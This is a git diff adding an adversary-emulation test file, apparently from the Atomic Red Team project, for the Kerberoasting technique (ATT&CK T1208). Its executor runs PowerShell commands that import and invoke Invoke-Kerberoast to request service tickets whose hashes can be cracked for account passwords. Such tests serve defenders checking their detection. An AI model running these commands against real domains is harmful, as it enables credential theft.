diff --git a/atomics/T1208/T1208.yaml b/atomics/T1208/T1208.yaml
new file mode 100644
index 00000000..0ab00dec
--- /dev/null
+++ b/atomics/T1208/T1208.yaml
@@ -0,0 +1,22 @@
+---
+attack_technique: T1208
+display_name: Kerberoasting
+
+atomic_tests:
+- name: Request for service tickets
+  description: |
+    This test uses the Powershell Empire Module: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
+    
+    The following are further sources and credits for this attack:
+    [Kerberoasting Without Mimikatz source] (https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/)
+    [Invoke-Kerberoast source] (https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/)
+  
+  supported_platforms:
+    - windows
+
+  executor:
+    name: powershell
+    elevation_required: false  
+    command: | 
+      Import-Module .\Invoke-Kerberoast.ps1
+      Invoke-Kerberoast | fl